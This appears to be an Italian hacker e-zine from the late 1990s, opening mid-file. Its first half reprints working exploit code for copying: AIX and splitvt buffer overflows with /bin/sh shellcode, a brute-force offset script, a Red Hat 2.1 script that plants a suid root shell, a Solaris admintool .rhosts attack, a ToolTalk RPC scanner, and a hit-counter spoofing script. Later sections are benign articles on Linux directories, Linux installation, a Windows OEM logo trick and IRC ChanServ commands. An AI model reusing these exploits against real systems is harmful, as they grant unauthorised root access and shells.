3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump */

#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="
LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;

mn=78;
max=100;

if (argc>1) corr = atoi(argv[1]);

pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("
Bad parameters");
exit(1);
}

#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) & 0x0000ffff);

reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;

if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000))
{
perror("
Return address has zero");
exit(5);
}

while(i++<max)
buf[i]=reta;
buf[i]=0;

for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;

if(QUIET)
{
puts((char*)&buf);
fflush(stdout);
exit(0);
};

puts("
Start...");/*Here we go*/

newenv[0]=createvar("
EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("
EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("
EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("
EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("
DISPLAY",getenv("DISPLAY"));
newenv[5]=VAR[0] ? createvar(VAR,justframes ? (char*)&frame : (char*)&buf):NULL;
newenv[6]=NULL;

args[0]=prog2;
execve(prog,args,newenv);
perror("
Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}

/*
------------brute-ksh-script----------------------------------------------------
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do ./a.out $L
L=`expr $L + $STEP`
done
--------------------------------------------------------------------------------
*/


UNIXWARE 2.x

* Post to BoS - try this with an account on a Unixware 2.x box. */
/* And here's another Unixware exploit. Should get you grp */
/* 23456 which will get you /usr/bin etc., etc., */
/* % cp /usr/bin/ksh . */
/* % chmod 2700 ./ksh */
/* % chgrp 23456 ./ksh */
/* % ./ksh */
/* > id */
/* */

#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#define KEYMATCH "
\x1D\xFC\x3A\x2FMZ"
#define TESTGRP 17186

int main(int argc, char **argv) {
struct stat st, *s = &st;
pid_t p;

if (argc == 2 && !strcmp(argv[1], KEYMATCH)) {
if (getegid() == TESTGRP) {
unsigned long r;

srandom(time(NULL));
r = (unsigned long)random();
r = (r & 0xFFFF00FF) | ((r & 0xFF000000 >> 16) ^
(r & 0x00FF0000 >> 8) ^
(r & 0x000000FF << 8));
fprintf(stderr, "
%s: system vulnerable code 0x%lX\n",
argv[0], r);
} else {
fprintf(stderr, "
%s: system not vulnerable\n",
argv[0]);
}
return 0;
}
if (argc > 1) {
fprintf(stderr, "
%s: don't supply any arguments\n", argv[0]);
return 0;
}
if (!strchr(argv[0], '/')) {
fprintf(stderr, "
%s: user error: run me with a pathname, not in
$PATH\n",
argv[0]);
return 0;
}
if (stat(argv[0], s)) {
fprintf(stderr, "
%s: system error: cannot stat my binary?\n",
argv[0]);
return 0;
}
if (s->st_uid != geteuid() && s->st_uid != getuid()) {
fprintf(stderr, "
%s: user error: does this uid own my
binary?\n",
argv[0]);
return 0;
}
chown(argv[0], -1, TESTGRP);
if (chmod(argv[0], 02700)) {
chown(argv[0], -1, s->st_gid);
chmod(argv[0], s->st_mode);
fprintf(stderr, "
%s: user error: cannot chmod my own binary?\n",
argv[0]);
return 0;
}
if ((p = vfork()) == -1) {
fprintf(stderr, "
%s: system error: cannot fork\n",
argv[0]);
return 0;
}
if (!p) {
execl(argv[0], argv[0], KEYMATCH, NULL);
fprintf(stderr, "
%s: system error: cannot exec\n",
argv[0]);
_exit(0);
}
chown(argv[0], -1, s->st_gid);
chmod(argv[0], s->st_mode);
return 0;
}




UN BELLO SCANNER :

/*

[ http://www.rootshell.com/ ]

Black Angel proudly presents :
------------------------------

TOOLTALK-RPC Scanner V1.1

Syntax :

./toolscan 195.3.90.2 196.0.0.0 [1]

^ ^ ^
| | |
Start-IP End-IP ToolTalk-RPC Version

If you don't specify any version number, the program will scan for any
version. I really don't know whether there are any versions beside the vulnerable
version 1, so I included this little feature (sorry for this lack of knowledge).

What it does :

Concerning 'CERT CA-98.11 tooltalk' there is a overflow in the tooltalk database
server - runing root, which allows an attacker to gain access. This little scanner
scans for this RPC-service.


Have fun !


PS : Use this program at your own risk.
*/

#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <rpc/rpc.h>
#include <rpc/pmap_clnt.h>
#include <arpa/inet.h>
#include <utmp.h>
#include <stdlib.h>

#define TOOLTALK_RPC 100083


main (int argc, char *argv[])
{
long counter;
struct in_addr addr;
unsigned long start;
unsigned long end;


int version = -1;


printf ("
Black Angel's ToolTalk RPC Scanner V1.1 9/1998 :\n");
printf ("
See CERT CA-98.11 tooltalk for more information\n");
printf ("
E-Mail : b_angel98@yahoo.com - [ http://www.rootshell.com/ ]\n\n");


if (argc == 4)
{
version = atoi (argv[3]);
}
else
{
if (argc != 3)
{
printf ("
\nusage : %s start-ip-address end-ip-address [RPC_VERSION]\n\n", argv[0]);
exit (0);
}
}

start = inet_addr (argv[1]);
end = inet_addr (argv[2]);

for (counter = ntohl (start); counter <= ntohl (end); counter++)
{
if ((counter & 0xff) == 255)
counter++;
if ((counter & 0xff) == 0)
counter++;

addr.s_addr = htonl (counter);

if (version == -1)
{
if (callrpc (inet_ntoa (addr), TOOLTALK_RPC, version, 0,
(xdrproc_t) xdr_void, (caddr_t) NULL,
(xdrproc_t) xdr_void, (caddr_t) NULL) == 9)
{

fprintf (stdout, "
Found ToolTalk : %s\n", inet_ntoa (addr));
fflush (stdout);
}
}
else
{
if (callrpc (inet_ntoa (addr), TOOLTALK_RPC, version, 0,
(xdrproc_t) xdr_void, (caddr_t) NULL,
(xdrproc_t) xdr_void, (caddr_t) NULL) == 0)
{

fprintf (stdout, "
Found ToolTalk Version %d : %s\n", version, inet_ntoa (addr));
fflush (stdout);
}
}
}
}



REDHAT 2.1

There is a security hole in RedHat 2.1, which installs the game abuse,
/usr/lib/games/abuse/abuse.console suid root. The abuse.console program
loads its files without absolute pathnames, assuming the user is running
abuse from the /usr/lib/games/abuse directory. One of these files in the
undrv program, which abuse executes as root. If the user is not in the
abuse directory when running this, an arbitrary program can be substituted
for undrv, allowing the user to execute arbitrary commands as root.
If abuse.console needs to be run by users other than root at the console,
provisions need to be made in the code to not execute or load any files
as root.

Program: /usr/lib/games/abuse/abuse.console suid root
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Patch: chmod -s /usr/lib/games/abuse/abuse.console
Security Compromise: root
Author: Dave M.

  
(davem@cmu.edu)
Synopsis: abuse.console runs undrv without an absolute
pathname while executing as root, allowing
a user to substitute the real undrv with
an arbitrary program.

Exploit:
#!/bin/sh
#
# abuser.sh
# exploits a security hole in abuse to create
# a suid root shell /tmp/abuser on a linux
# Red Hat 2.1 system with the games package
# installed.
#
# For release 2/2/96 - 1 drink credit please.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
_EOF_
cat << _EOF_ >> /tmp/the_wall
so ya thought ya might like to go to the show
to feel the warm thrill of confusion that space cadet glow
tell me is something eluding you sunshine?
is this not what you expected to see?
if you wanna find out what's behind these cold eyes
you'll just have to claw your way through this disguise
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo ================ Executing Abuse
/usr/lib/games/abuse/abuse.console
/bin/rm /tmp/undrv
/bin/rm /tmp/the_wall
if test -u /tmp/abuser
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi



ADMIN TOOL:

setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
(browse -> group -> edit a group -> get an error message -> exit)
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"


WEBSITESPOOF:

#!/bin/bash
# ######################################################################
# WebSideSpoof.sh Written by RSnake (7/17/1998)
# Come and visit: http://www.webfringe.com !!!
#
# Sanitized and made LUSER-friendly by Tattooman (7/19/98)
#
# Run with these commands at your shell account prompt:
#
# chmod 700 webside_spoof.sh
# webside_spoof.sh 4000 5
#
# Where '4000' is the amount of times you wish to spoof - must not be
# larger than '999999' and must be a multiple of 4 for most reliable
# (pretty looking) output. Also '5' is the delay between spoofs.
# You'll probably want to keep the delay at '1' or above unless you
# are running this script on a Cray. The load stays below 2 on a 133
# Linux box with a delay of '1'.
#
# Replace the 'url' line with YOUR WebSideStory cgi link:
# ######################################################################

url=http://w12.hitbox.com/wc3/W123456789.cgi

x=$1
while [ $x -gt 0 ]
do
lynx -dump $url > /dev/null &
x=$(($x-1))
echo -n $x ' '
sleep $2
done
echo && echo Done.


SPLITVT:

syntax:

%cc -o sl sl.c
%sl
bash#sl
bash#splitvt
#whoami
root
--------------------------------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;

egg = eggplant;

*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';

egg2 = (long *)egg;

for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;

egg=(char *)egg2;

for (a=0;a<0x40;a++) *(egg++) = 0x90;

while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */

putenv(eggplant);

system("/bin/bash");
}

Bhe ora vi lascio al bel copia incolla ciao ciao
ZeroCool [volevo metterle ringraziando rootsheel che lo ha concesso x darvi anche se non sono lavori nostri un poco di info e
di aggiornamenti nel caso uno non si documenti].

TELECOZZ MA QUANTI CAMBIAMENTI:

Raga mentre sto scrivendo questo articolo sono molto depresso a causa sulle mie
opinioni presonali sul fatto.
Prima di tutto si parlava di una magica fusione [o meglio acquisto] da parte di una
societa' di telecazz ma per ora telecom ha solo risaldato il suo monopolio con
la fusione con tim mha mica giusto.
Speriamo che questo porti a miglioramenti per quanto riguarda internet [hihihi io
non ci credo x nulla] . Si parla anche di un decreto inserito nella finanziaria
attuale bhe proprio di questo volevo parlarvi.
Allora in sto cazz di decreto si vuole proporre [ o meglio fissare la connessione
a internet in uno scatto che durera' per un numero di ore Stop tut insomma ]per
cosi' dire l'abolizione della tut.
MA vediamo ora le fasi x arrivare a questo risultato per capirci meglio:

FASE 1: La legge finanziaria [ora superata] approvazione entro il 30 settembre
e scadenza di approvazione entro il 31 dicembre]
FASE 2: I provvedimenti collegati [stesse date ] fase superata
FASE 3: La previsionale progrmmatica [no approvazione ] fase superata
FASE 4: approvazione decreti collegati [quando cazz la fanno bho ] ed e' questa che
ci interessa xche\ promulga l'approvazione di questa legge .

ZeroCool

`Bha io spero che la fusione tra telecazz e olivetti avvenga magari si risolevra'
qualche cosa ... speriamo

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ DIRECTORY DI SISTEMA CON DESCRIZIONE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

<<<----SARDINIA HACKERS---->>>

-SAPERE E' POTERE- by Zinco

Vi siete mai chiesti cosa contengono tutte le directory di un sistema? Ecco
la descrizione di ogni singola directory.

DIRECTORY DESCRIZIONE

/ Punto "iniziale" della struttura delle directory; chiamato
root o radice.
/home Contiene la directory home degli utenti.
/bin Contiene i comandi e i programmi di servizio standard.
/usr Contiene i file e i comandi utilizzati dal sistema; questa
directory contiene molte sottodirectory.
/usr/bin Contiene i comandi e i programmi di servizio per gli utenti.
/usr/sbin Contiene i comandi di amministrazione del sistema.
/usr/lib Contiene le librerie dei linguaggi di programmazione.
/usr/doc Contiene la documentazione Linux.
/usr/man Contiene il "manuale in linea" di Linux.
/usr/spool Contiene i file "spooling", ovvero in attesa di essere
stampati o di essere trasferiti in rete.
/sbin Contiene i comandi di amministrazione per l'avvio del
sistema.
/var Contiene file variabili, ad esempio i file delle caselle
postali.
/dev Contiene le interfacce con i dispositivi, ad esempio i
terminali e le stampanti.
/etc Contiene i file di configurazione del sistema e altri file
di sistema. ;)
Zinco

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ INSTALLAZIONE LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Il 1ø grande muro da abbattere per raggiungere la salvezza:
La tanto famosa quanto ostica installazione del LinuxCome avevo gia' anticipato
in un altro articolo scritto precedentemente da me medesimo, l'unicasoluzione
per evitare di essere traghettatidall'ormai mitico Caronte Gates sul suo battello
Wincazz su di un fiume di errori di sistema Wonder-Linux che non e' un nuovo tipo
di reggisenoche tira su' e spinge verso l'interno bensi' unSistema operativo
mooolto + affidabile di quello su citato e che io definirei quasi in-inchiodabile!!
Unico grande problema di questo OS e' la sua grandecomplessita' sia nella
configurazione che nellagestione.1øgrande passo e' ovviamente la sua
installazioneormai diventata famosa tra i pischelleti chesi trovano davanti
questo sistema ma che nonconoscono quasi per nulla il suo funzionamento.
In questo articoletto vi descrivero' come abbatterequesto 1° muro.........
Inanzi tutto voglio specificare che il metododi installazione da me desritto
e' stato usatoper far insidiare la distribuzione Red Hatversione 5.2 di Linux.
1ø punto e' la creazione di un disco di boot.Per creare un disco di boot bisogna
usare il proggie contenuto nel CD di nome rawrite.exe.Dopo averlofatto partire
andrete a specificare un fileimmagine da cui creare il disco di boot.
Es. d:\linux\images\boot.imgIl disco di boot se avrete specificato conesattezza
il percorso del file .img sara'creato e potrete procedere con la formattazione del
vostro HD e all'inserimento del discodi avvio (boot) del Linux.
2ø punto Fate partire il programma di installazionee come prima richiesta ci sara' da
selezionare la lingua..non penso sia ardua la scelta....turco???poi il tipo di
tastiera (it) ed ancora il tipo disupporto da cui verra' installato il S.O.
3ø Ora viene la parte un po' + complicata: la creazione delle partizioni
Dovrete infatti creare altre 2 partizioniuna -linux Native ed una di supporto
-linux swapper crearle hai una doppia scelta : FDISK o Disk DruidPer comodita'
usiamo il vecchio, ma sempre valido,FDISK.i comandi essenziali sono questi:

Comando Descrizione

m lista dei comandi
d cancella partizione
n crea nuova partizione
t specifica il tipo di partizione
q esci senza salvare
w esci salvando Adesso crea 2 nuove partizioni primarie, ti
chiedera' un numero da dare alle partizioni e la loro grandezz
da specificare in numeri di cilindri Es. dal cilindro500 al 570.

Create le partizioni dovrete andargli a specificare il tipo ovviamente saranno
una Linux Native e l'altra swap.Salva il tutto tramite il comando w.Ora clicka
su ok e seleziona la partizione Native editalae immetti /.Seleziona la swap e
spingi ok.Da ora in poi dovrebbe essere veramente facile, selezionai componenti
da installare e segui le istruzioni.Ultimo ma decisivo passo e' quello di
cestinare Findus 95.Tante grazie a tutti quelli che mi aiutano ed unFUCK
________
|____|
n [(O--O)] n
H _|\__/|__ H
nHnn/ \____/ \nnHn To: BILL GATES !!!
<VVVV / \ VVVV>
\__/| | \_/

By Dante Alighieri

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ LOGHI OEM ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora , adesso un altro piccolo trukketto per Win , ma che ho testato solo
sotto Win95 ma in teoria anke sotto il 98 dovrebbe funzionare...Si tratta
solo e semplicemente di aggiungere le informazioni che volete allo schermo
delle proprieta' del sistema. Insomma, da risorse del computer , se fate
click con il tasto destro e scegliete proprieta' vedrete lo schermo del
quale vi sto parlando. Bene, adesso aggiungiamo un paio di informazioni
personali :-]
Create un file di testo con il nome OEMINFO.INI e mettete queste righe :

[general]
Manufacturer=
Model=
[Support Information]
Line1=
Line2=
Line3=
Line4=
Line5=

Salvatelo in /windows/system e siete a posto!
Magari se vi spiego il significato non sarebbe male , eh?
Ok, da [general] a [Support Information] potete inserire i datio che verranno
visualizzati nella finestra principale cioe' il nome del costruttore del pc
ed il modello.Da [Support Information] in poi tutto il testo che scriverete
sara' visualizzato in una finestra secondaria , accessibile cliccando su
"Informazioni di supporto...". Ricordate che per ogni nuova linea dovete
usare il commento iniziale "LineX=" dove X sta per il numero progressivo.
Per non fare apparire la barra di scrolling del testo , limitatevi a 16 linee
comunque per il testo inserito non ci sono limiti di lunghezza. Relativamente
alla larghezza , invece , se vi e' possibile , non superate i 57 caratteri in
modo da non far comparire la barra di scorrimento orizzontale.Bene , e fin
qui non penso ci siano problemi...Ok, avete messo un paio di info in + ,
adesso provate anke ad aggiungere un logo.Create un file bitmap (*.bmp) che
non superi i 180 pixel di larghezza ed i 114 di altezza. Chiamatelo OEMLOGO.BMP
e mettetelo in /windows/system.Vedrete apparire l'immagine sotto il monitor
in proprieta' del sistema , sormontata dalla scritta "Prodotto da:" ...
Carino ,no?
Tenete presente che se volete un logo con sfondo grigio uniforme al "grigio
windows"
il colore da usare e' esattamente 192.192.192 in RGB ovviamente...
Se poi trovate ancora qualche altro trukketto se me lo fate sapere mi fate felice!
per adesso e' tutto ,

RigoR MorteM SPP 98-99

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

####COME REGISTRARE UN CANALE CON IL CHANSERV {e il nick con NickServ} E
COME TROVARE l'IP NELLE RETI IRC CHE LO MASCHERANO by Newbie 1.1 (+ Max)####

Questo 'articolo' (mi vergogno un po' a chiamarlo cosi' visto il livello piu'
che elevato degli altri articoli di NewBies...chiamiamolo 'quest'accozzaglia
di nozioni che chiunque puo' trovare da solo ma che ho riunito qui per la
comodita' di tutti'...) mi e' stato 'commissionato' tempo fa da ChRome; non
si tratta di nulla di particolare, ma visto che a qualcuno interessava,
eccolo qui: un grazie a [Max] per il suo pezzo sul /whowas e a N0body88 che
ha insistito perche' lo scrivessi (scusa ancore per il ritardo...).
L'articolo sarebbe dovuto essere molto piu' lungo e piu' esplicativo...ma una
serie di casini incredibili (file corrotti, registro sputtanato, ecc. ecc.)
mi hanno impedito di scriverlo come avrei voluto, mi dispiace. Ora cmq che
l'ho finito, posso finalmente formattare tutto e mettermi Linux! :)))

Tutto quello che scrivo e' pienamente valido per i server della rete di
Azzurra (non la conoscete? Male! Molto male... ;) ma in generale anche su
altre reti IRC...

Consiglio quindi di accertarsi volta per volta dei servizi effettivamente
disponibili.
Mi era stato chiesto di scrivere un articolo su come usare ChanServ per
creare e registrare canali, ma per essere piu' completo ho deciso di
raccogliere TUTTI gli help del ChanServ e di tradurli assieme a qualche mio
commento.
Questo vuole essere una piccola guida per newbie all'uso di servizi spesso
trascurati se non ignorati del tutto, eppure molto utili.
Visto che il 90% degli utenti di una rete IRC non legge gli help...credo che
questa guida avra' una sua utilita', tenendo anche conto del fatto che non
tutti gli help possono essere loggati...
Se notate errori, imprecisioni (che sicuramente ci saranno...) o volete
inviarmi dei vostri commenti o suggerimenti, scrivete a night_storm99@hotmail.com,
grazie {NON chiedetemi crack, please! Altrimenti vi faccio friggere l'hard
disk con la sola imposizione delle mani!!! ^_^}.

La Rete di Azzurra IRC Network:

IRC.Jnet.it Roma IRC.Azzurra.it Azzurra IRC Server Verbania
IRC.net36.com NET36 irc sever Bologna
IRC:myline.it Sintesi s.r.l. Crotone
IRC.swappoint.com Torino

Xfiles.azzurra.com Verbania
IRC.filmaker.it Bologna
www2.leonet.it Firenze ==> Java chat + Proxy = Felicita' :)
IRC.cervia.com Ravenna

Ryoko.klis.com Canada
IRC.theevilman.dynip.com Canada
IRC.swappoint.com Canada


-Servizi Disponibili:
ChanServ Servizio di registrazione canali /MSG ChanServ HELP
NickServ Servizio di regisatrazione nicknames /MSG NickServ HELP
MemoServ Servizio di messaggistica /MSG MemoServ HELP
SeenServ Servizio SEEN/WHOWAS utenti /MSG SeenServ HELP
HelpServ Servizio di aiuto sui comandi IRC /MSG AdminServ HELP
CYBCOP Servizio di sicurezza e manutenzione /MSG CYBCOP HELP


Premessa: quello che diro' e' valido nel server IRC.Jnet.it e in altri server
IRC, ma non ovunque....Per maggiori informazioni, leggetevi molto attentamente
il MOTD (Message Of The Day), il testo che riceverete non appena connessi ad
un server IRC....e verificate se anche li' e' possibile registrare nick, canali,
ecc. ecc.
In ogni caso dovrebbe essere sempre possibile tramite degli help conoscere
tutti i vari comandi e nei casi estremi si puo' sempre ricorrere ai solerti
(?) IrcOp (dai Deb non ti offendere, sto scherzando hihihihi ;-).
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

Come creare e registrare un canale.

Creare un canale IRC e' una cosa semplicissima: basta entrare (/JOIN) in un
canale non ancora esistente e lo avremo creato!
Possiamo creare due tipi di canali: esistenti su tutta la rete o solo sul
nostro server preferito, i primi cominceranno con # e i secondi con &.
Nel resto dell'articolo parleremo solo dei primi, me tutte le info sono
applicabili anche ai secondi.
Supponiamo ad es. di voler creare il canale #chrome, non dovremo fare altro
che digitare nel nostro client IRC: /JOIN #chrome per entrare e creare il
canale #chrome! ^_^
Ovviamente quando usciremo dal suddetto canale (/PART) o ci disconnetteremo
dal server IRC (/QUIT o /DISCONNECT), il canale morira' (sigh!).
Come fare allora per impedirlo? Come dare vita eterna o quasi al canale
dedicato al nostro beniamino? ^__^;;;;;
Semplice: dobbiamo registrarlo.
E' per questo che esiste il ChanServ.
Per fare cio' dovremo inviare dei comandi particolari sotto forma di messaggi
ad un ChanServ, cioe' ad un bot preposto a questo compito.
Cosi' come si inviano messaggi privati agli altri chattatori tramite il comando
/MSG, cosi' si possono inviare messaggi ai bot del server (ChanServer,
NickServer, ecc.) e tramite i suddetti messaggi impartire loro dei comandi,
purche' si segua la giusta sintassi.
Registrare un canale e' anche utile per impedire a terzi di registrarlo e di
estrometterci da esso.
Supponiamo ad esempio che il nostro canale abbia il meritato successo e che
un lamer invidioso voglia impadronirsene...bene, se non abbiamo registrato
il canale sara' semplicissimo per lui farlo: non dovra' fare altro che
aspettare il momento in cui noi non siamo collegati al server e il canale e'
vuoto, cioe' scomparso, per ricrearlo e registrarlo... ;__;
Se invece noi lo registriamo, il lamer non potra' farci nulla e, sempre
tramite l'amato/odiato ChanServ, potremo controllare il canale in maniera'
piu' che completa, grazie ad una moltitudine di comandi che andro' ad
elencare tra poco, ad es. potremo inserire seduta stante il lamer nella
kick list, cosi' non appena provera' ad entrare nel canale per rompere le OO
verra' immediatamente kickato e bannato fuori dal fido ChanServ.
Il ChanServ e' il migliore amico del chanop, ma purtroppo e' un po' tonto e
cosi' per fargli capire cosa vogliamo che faccia dovremo imparare la sua
lingua...eccola spiegata passo per passo.

<<<CHANSERV FOR DUMMIES>>>
======================================

Qui di seguito raccolgo e traduco tutti gli Help del ChanServ di IRC.Jnet.it
aggiungendo qualche commento ed esempio pratico che illustri meglio le varie
funzionalita'.

Poiche' per registrare un canale bisogna pero' prima aver gia' registrato il
tuo nick, vediamo brevemente come fare:
/MSG NickServ register <nick> <password>
Es.: /MSG NickServ register Newbie VivaMaster

Dopo aver registrato il nick, chiunque voglia usarlo in quella rete IRC,
dovra' entro 60 sec. da quando si connette inviare la password del nick al
NickServ, cosa che si puo' fare in due modi:
1.) /MSG NickServ identify <password>
2.)/PASS <password>

Bastera' che in mIRC Options/Perform inseriate uno di questi due comandi tra
i comandi da eseguire appena si e' connessi e non dovrete preoccuparvi di
altro. :)


Il ChanServ e' un BOT ufficiale che si occupa delle gestione dei canali registrati.
======================================

Se si invia al ChanServ un messaggio di Help senza oggetto [ /MSG chanserv
help ] si ottiene una serie di informazioni generali che traduco qua sotto:

***** ChanServ Help*****
Chanserv permette agli utenti di registrare un canale.
L'utilizzo di ChanServ consente al canale di essere controllato senza il
bisogno di un bot e rende i takeovers {cioe' le 'conquiste' di un canale da
parte di disturbatori esterni} del canale virtualmente impossibili.
ChanServ abbandonera' un canale registrato se nessun AOp o SOp entrera' nel
canale per 20 giorni.
Comandi:

REGISTER - Registra un canale;
SOP - Modifica la lista degli SOp di un canale;
AOP - Modifica la lista degli AOp di un canale;
VOP - Modifica la lista degli VOp di un canale;
AKICK - Modifica la lista AKICK di un canale;
DROP - Elimina un canale registrato;
SET - Cambia i settaggi di un canale;
IDENTIFY - Identifica voi come fondatori del canale;
INFO - Mostra informazioni sul canale;

Altri Comandi del ChanServ:

UNBAN ACCESS OP DEOP
INVITE MDEOP MKICK MODE;
Per informazioni dettagliate: /MSG ChanServ help <comando>.
***** Fine dell'Help *****
======================================
Bene, esaminiamo adesso gli Help particolari di ogni comando e delle sue
opzioni (se disponibili) dando qualche esempio pratico li' dove necessario.

======================================
/MSG ChanServ Help Register

-ChanServ- ***** _ChanServ_ Help *****
-ChanServ- Comando - REGISTER
-ChanServ- Sintassi - REGISTER <canale> <password> <descrizione>
-ChanServ- Usato per registrare un canale con il ChanServ.
-ChanServ- Dopo aver registrato il tuo canale, un IRC bot
-ChanServ- non sara' necessario per mantenere gli op, e non dovrai
-ChanServ- preoccuparti di takeover (scalate, conquiste) del canale.
